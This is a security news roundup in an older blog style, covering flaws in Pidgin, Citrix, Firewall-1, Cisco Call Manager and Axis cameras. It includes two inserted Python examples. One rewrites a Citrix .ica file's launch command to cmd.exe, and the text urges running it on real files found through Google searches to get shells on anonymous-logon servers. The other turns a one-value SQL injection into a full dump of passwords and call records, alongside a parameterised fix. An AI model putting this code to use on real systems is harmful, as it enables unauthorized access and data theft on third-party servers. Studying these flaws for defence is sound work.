[http://securityvulns.com/Sdocument126.html Pidgin Remote DoS] - [PaulDotCom] - A "nudge" message sent to a user of Pidgin on the MSN network will cause the client to access invalid memory and crash. Vulnerabilities in chat clients that trigger on merely receiving a message are very scary, and seem to be popular these days. It's interesting: since we have firewalled ourselves into oblivion, a great way to get evil packets to your victim is via IM. Web browser and web-based exploits are cool too, but you still have to get the user to click on something. If I am in a chat channel or on IM, you just need to send me a message and I am pwned.
[http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/ Citrix Low-Tech Hacking] - [PaulDotCom] - Hacking without exploits is great, and that's my new catch phrase. All these people patching everything, running IPS, A/V, and what not make it a little harder to run traditional exploits (I did say a "little"). This is a great example of how to use your Google hacking skills (okay, it's a simple query: "ext:ica") to find Citrix servers. Looking into the .ica file reveals which program or command the client asks the server to run, and if the server allows anonymous logon, we can change that command to "cmd.exe". Sweet! Instant command shell!
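The .ica file inspection the post describes, as an added example in Python (not code from the post, from GNUCITIZEN or from Citrix): it parses the INI-style .ica file, reports what each published application would launch and whether the file embeds credentials, and performs the client-side edit of InitialProgram. The key names (Address, InitialProgram, Username, ClearPassword) are standard ICA client settings; the sample file, host name and address are constructed.

```python
"""Inspect and rewrite the launch command in a Citrix .ica file.

Added example, not from the original post or from Citrix. An .ica file is an
INI-style text file; the key names used here are standard ICA client
settings, but the sample below is constructed, not captured from a server.
"""
import configparser

# Constructed sample: one published application plus embedded anonymous
# credentials so the client connects without prompting.
SAMPLE_ICA = """\
[WFClient]
Version=2
HttpBrowserAddress=ica.example.com:8080

[ApplicationServers]
Notepad=

[Notepad]
Address=192.0.2.10
InitialProgram=#Notepad
Username=anonymous
ClearPassword=
Domain=
"""


def parse_ica(text: str) -> configparser.ConfigParser:
    """Parse ICA text, keeping key case and allowing value-less keys ('Notepad=')."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def inspect_ica(text: str) -> list:
    """For each published application, report what the file would launch and
    whether it ships credentials: the two things the post says to look at."""
    cp = parse_ica(text)
    findings = []
    for app in cp["ApplicationServers"]:
        sect = cp[app] if cp.has_section(app) else {}
        prog = sect.get("InitialProgram", "") or ""
        findings.append({
            "app": app,
            "address": sect.get("Address", ""),
            # '#Name' refers to a published application; anything else is a
            # raw command line the server is asked to run.
            "initial_program": prog,
            "is_published_app": prog.startswith("#"),
            "has_embedded_credentials": bool(sect.get("Username"))
            and ("Password" in sect or "ClearPassword" in sect),
        })
    return findings


def set_initial_program(text: str, app: str, command: str) -> str:
    """Rewrite InitialProgram for one app, e.g. '#Notepad' -> 'cmd.exe'.
    This is the client-side edit the post describes; whether the server honours
    it depends on whether anonymous sessions are restricted to published apps."""
    cp = parse_ica(text)
    cp[app]["InitialProgram"] = command
    out = []
    for section in cp.sections():
        out.append(f"[{section}]")
        for key, value in cp[section].items():
            out.append(f"{key}={value}" if value is not None else key)
        out.append("")
    return "\n".join(out)


if __name__ == "__main__":
    for finding in inspect_ica(SAMPLE_ICA):
        print(finding)
    print(set_initial_program(SAMPLE_ICA, "Notepad", "cmd.exe"))
```

Run it against a real .ica file pulled from a search hit and the interesting cases are the ones where `has_embedded_credentials` is true and `is_published_app` is true: the credentials get you a session, and the rewritten InitialProgram is what you then ask that session to run.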
[http://www.heise-security.co.uk/news/96860/from/atom10 Firewall-1 is full of holes] - [PaulDotCom] - I did not have time to read the 200+ page report; however, reports say it looks legit. Many of the attacks appear to be buffer overflows in local commands, which sounds like it would require access to the firewall already. However, it's how they found these exploits that is scary: ''"According to Pentest, they have not even used fuzzing tools for their tests, but have simply used manipulated arguments to cause a buffer overflow in the programs; this does not comply with the vendor’s description of the relevant target of evaluation"''. So, like, passing a large parameter to a command triggers a buffer overflow, sweet! If it's that easy, where are other holes lurking?
[http://isc.sans.org/diary.html?storyid=3456 Protecting Mobile users - ideas?] - [PaulDotCom] - Chris is right, we need to protect our mobile users. However, traditional methods such as logging on with user privileges, A/V, anti-spyware, and firewalls just aren't enough. Malware is too smart, and users are too dumb. We almost need to wipe mobile users' machines on a regular basis, and keep the data separate and protected. It would be a neat experiment: store all your data on an encrypted thumbdrive, then your machine gets wiped every time you come back to the office... I know, I am the "Mad Security Geek".
[http://www.milw0rm.com/exploits/4482 A nice healthy SQL Injection Exploit] - [PaulDotCom] - A notice to all companies producing web applications: when a vulnerability is found in your product, take down your demo site.
[http://blogs.technet.com/bluehat/archive/2007/09/28/the-new-security-disclosure-landscape.aspx RFP Emerges, Speaks about disclosure] - [PaulDotCom] - According to RFP, testing someone else's web site is a no-no. Quote: ''"NO MATTER YOUR INTENTIONS, LOOKING FOR SECURITY VULNERABILITIES IN THIRD-PARTY WEB SITES (without permission) IS ILLEGAL PER THE LAWS OF YOUR COUNTRY. Period. "'' Whoa. This could go either way. I've seen some people be happy that you found a vuln in their web site, and I can definitely see it going the other way. Thoughts? Oh, and where has RFP been since 2003 anyway? BTW, check out some [http://www.microsoft.com/technet/security/bluehat/2007fall.mspx podcasts from Microsoft.]
[http://www.engadget.com/2007/09/28/iphone-update-facts-and-fiction/ iPhone "bricking" and hacking] - [PaulDotCom] - A bit off-topic, but some people are wondering why their iPhones are bricked once they apply a firmware update to a hacked phone. As a comparison, OpenWrt can also potentially brick on an upgrade, but I would still like to know more about how the iPhone works (my understanding is that there is firmware on the modem and a separate OS for the rest?). [http://www.mckeay.net/secure/2007/09/ibrick.html Martin seems convinced] that Apple did this on purpose; however, it could just be an artifact of hacking plus a firmware upgrade. Why would they only brick phones unlocked with the anySIM program and not all hacks?
[http://seclists.org/vulnwatch/2007/q3/0056.html Cisco Call Manager SQL Injection and XSS] - [PaulDotCom] - These vulnerabilities exist in the login page, hence you do not need to be authenticated. The SQL one is interesting, ''"An attacker could exploit the SQL injection vulnerability to read a single value from the database. Several successful attacks could disclose information about the database, information such as user names and passwords, and information from call records such as the time calls are placed and the numbers dialed. This vulnerability cannot be used to alter or delete call record information from the database."'' Niiiiiice! Extracting call records, that could be interesting...
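To show what "read a single value from the database" buys an attacker, here is an added example in Python (not code from the Cisco advisory, from Call Manager, or from the milw0rm exploit against the demo site mentioned above): a constructed login lookup built by string concatenation against an in-memory SQLite database, a loop that turns the one-value-per-request primitive into a full column dump of user names, passwords and dialed numbers, and the parameterised form that stops it. The schema, table names, sample rows and payloads are all assumptions made for the example.

```python
"""One-value-per-request SQL injection, and what a loop of them yields.

Added example, not code from the Cisco advisory or the milw0rm exploit. The
schema, the login lookup and the payloads are constructed to mirror the
advisory's description (an unauthenticated page whose query leaks one value
per request), not Call Manager's real code.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts and two call-detail records."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(name TEXT, pw TEXT);
        CREATE TABLE cdr(placed TEXT, dialed TEXT);
        INSERT INTO users VALUES ('admin', 'hunter2'), ('helpdesk', 'welcome1');
        INSERT INTO cdr VALUES ('2007-09-28 09:15', '5551234'),
                               ('2007-09-28 10:02', '5559876');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str):
    """The vulnerable form: input concatenated into the query, and the first
    column of the first row echoed back, i.e. exactly one steerable value."""
    sql = f"SELECT name FROM users WHERE name = '{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, username: str):
    """Hardened form: the same input is bound as a parameter, so it is only
    ever compared as a string and never parsed as SQL."""
    row = conn.execute("SELECT name FROM users WHERE name = ?", (username,)).fetchone()
    return row[0] if row else None


def dump_column(conn: sqlite3.Connection, table: str, column: str) -> list:
    """Turn the one-value primitive into a column dump: each request injects a
    UNION whose scalar subquery picks row N; a NULL marks the end of the table."""
    values = []
    offset = 0
    while True:
        payload = (f"' UNION SELECT (SELECT {column} FROM {table} "
                   f"ORDER BY {column} LIMIT 1 OFFSET {offset}) -- ")
        value = lookup_vulnerable(conn, payload)
        if value is None:
            return values
        values.append(value)
        offset += 1


def can_stack_statements(conn: sqlite3.Connection) -> bool:
    """Try to ride a DELETE on the same request. Python's sqlite3 refuses a
    second statement per execute(), so this primitive reads but cannot alter,
    which matches the advisory's 'cannot be used to alter or delete' caveat."""
    try:
        lookup_vulnerable(conn, "'; DELETE FROM cdr; -- ")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return False
    return True


if __name__ == "__main__":
    db = build_db()
    print("passwords:", dump_column(db, "users", "pw"))
    print("dialed numbers:", dump_column(db, "cdr", "dialed"))
    print("stacked DELETE accepted:", can_stack_statements(db))
    print("safe lookup of payload:",
          lookup_safe(db, "' UNION SELECT (SELECT pw FROM users) -- "))
```

The point of `dump_column` is the one the advisory makes without saying it: a primitive that leaks "a single value" is a full database read once you put it in a loop, and the only thing the read-only property buys the defender is that the call records are still there afterwards. `lookup_safe` shows that the fix is binding the parameter, not filtering quotes.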
[http://www.procheckup.com/Vulnerability_Axis_2100_research.pdf Pwning the Axis Camera] - [PaulDotCom] - A slew of vulnerabilities exist here, many of which are persistent XSS, which lets an attacker redirect the camera's video feed. So, instead of seeing [http://www.youtube.com/watch?v=IuwMOBM5xfU Female Ninjas rob the store], you see an empty store with the clerk picking their nose. Sweeeet.